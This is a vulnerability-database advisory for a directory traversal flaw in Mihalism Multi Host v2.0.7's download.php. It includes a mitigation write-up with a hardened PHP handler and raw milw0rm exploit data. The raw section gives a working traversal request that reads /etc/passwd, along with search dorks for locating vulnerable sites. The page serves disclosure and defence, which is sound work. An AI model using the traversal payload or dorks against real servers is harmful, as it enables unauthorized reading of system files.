vendor: Mihalism Multi Host
by: Unknown
CVSS: 7.5 HIGH
Remote File Disclosure
CWE: 22
Product Name: Mihalism Multi Host
Affected Version From: Mihalism Multi Host v2.0.7
Affected Version To: Mihalism Multi Host v2.0.7
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Mihalism Multi Host v2.0.7 download.php Remote File Disclosure Vuln

The vulnerability allows an attacker to disclose files on the remote server by exploiting the 'download.php' script. By manipulating the 'file' parameter and using directory traversal techniques, an attacker can access sensitive files such as the '/etc/passwd' file.

Mitigation:

To mitigate this vulnerability, the 'file' parameter handled by the 'download.php' script should be properly validated and sanitized to prevent directory traversal attacks. Additionally, access control should be implemented to restrict unauthorized access to sensitive files.
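
One way to implement the validation described above, as an added example that is not code from Mihalism Multi Host or from the original advisory. It assumes all downloadable files sit in one flat directory; `UPLOAD_DIR`, its path and `resolve_download()` are hypothetical names.

```php
<?php
// Added example: hypothetical hardened download handler, not Mihalism Multi Host code.
// ASSUMPTION: every downloadable file lives directly in UPLOAD_DIR (made-up path).
const UPLOAD_DIR = '/var/www/example/uploads';

/**
 * Map a user-supplied file name to a canonical path inside $baseDir.
 * Returns the path, or null when the request must be refused.
 */
function resolve_download($requested, string $baseDir): ?string
{
    // Only a plain string is acceptable (file[]=x would arrive as an array).
    if (!is_string($requested)) {
        return null;
    }
    // Allowlist: a bare file name, no "/", "\" or NUL byte, bounded length.
    if (!preg_match('/\A[A-Za-z0-9._-]{1,128}\z/', $requested)) {
        return null;
    }
    // Names made only of dots ("." and "..") are never files.
    if (trim($requested, '.') === '') {
        return null;
    }
    // Canonicalise both sides: realpath() resolves ".." and symlinks and
    // returns false when the target does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    // Containment check on the canonical path, with a trailing separator so
    // that "/uploads_private" does not pass as a child of "/uploads".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

$file = resolve_download($_GET['file'] ?? null, UPLOAD_DIR);
if ($file === null) {
    http_response_code(404); // same answer for "refused" and "missing"
    exit;
}
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Length: ' . filesize($file));
readfile($file);
```

The access-control part of the mitigation (checking that the requesting user is allowed to fetch the resolved file) belongs before the `readfile()` call and depends on how the application tracks file ownership.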

Exploit-DB raw data:

    ########                  ######              ####                ######  ######
  ##      ##                    ##                  ##                  ####  ####  
  ##              ######        ##            ####  ##                  ####  ####  
  ##            ##      ##      ##          ##    ####                  ##  ##  ##  
  ##    ######  ##      ##      ##    ##    ##      ##                  ##      ##  
  ##      ##    ##      ##      ##    ##    ##      ##                  ##      ##  
    ######        ######      ##########      ##########              ######  ######
                                                        ##############              

####################################################################################
###### Mihalism Multi Host v2.0.7 download.php Remote File Disclosure Vuln     #####
###### Script Page :  :(                                                       #####
###### POC :                                                                   #####
###### /Script/download.php?file=../../../../../../../../../../../etc/passwd   #####
###### D0rkS :                                                                 #####
###### Powered by Mihalism Multi Host v2.0.7                                   #####
###### Powered by Mihalism Multi Host v2.0.5                                   #####
###### Powered by Mihalism Multi Host v2.0.4                                   #####
###### Powered by Mihalism Multi Host v2.0.3 MBF                               #####
###### Powered by Mihalism Multi Host v3.1.1 Final                             #####
###### GREETZ TO :                                                             #####
###### TrYaG-TeaM , H-T Team , RoMaNcYxHaCkEr , Asb-May's Team & ALL           #####
####################################################################################

# milw0rm.com [2007-12-30]